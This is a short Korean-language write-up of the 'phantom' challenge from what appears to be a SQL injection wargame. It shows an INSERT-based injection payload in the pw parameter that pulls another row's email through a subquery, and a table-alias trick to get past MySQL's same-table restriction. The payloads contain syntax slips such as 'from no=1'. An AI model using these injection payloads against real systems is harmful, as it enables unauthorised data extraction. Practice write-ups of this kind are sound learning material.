phantom(서브쿼리)

$_SERVER["REMOTE_ADDR"] : 웹서버에 접속한 접속자의 IP 정보를 갖고있다. 

 

no=1 즉 127.0.0.1의 email을 알아내라

---

롸업을 보기는 했지만 어려운 문제는 아니었다. 다만 여태 푼 문제 중 이렇게 푼 문제가 없어서 생각해내지 못했다.

그래도 알아가면 됐지!

 

?pw=qw', (0, '내 ip', (select email from prob_phantom from no=1))%23

이렇게 하면 될 것 같지만 되지 않는다.

---

[****]

서브쿼리를 줄 때 자신의 테이블에서 참조가 안된다.

더 자세히 말하면, insert/ update/ delete에서 서브쿼리로 동일한 테이블의 조건을 사용할 때 에러가 발생한다.

insert into attack values (11, 'du', 'du', 234, 'du','du', 'du'), (12, (select program from attack where attackId=1),'aa',234,'aa','aa','aa');

"You can't specity target table 'attack' from update in FROM clause"

---

이를 해결하는 방법이 바로 as (임의의 테이블명) 을 사용하는 것이다.

 

?pw=qw', (0, '내 ip', (select email from prob_phantom as prob from no=1))%23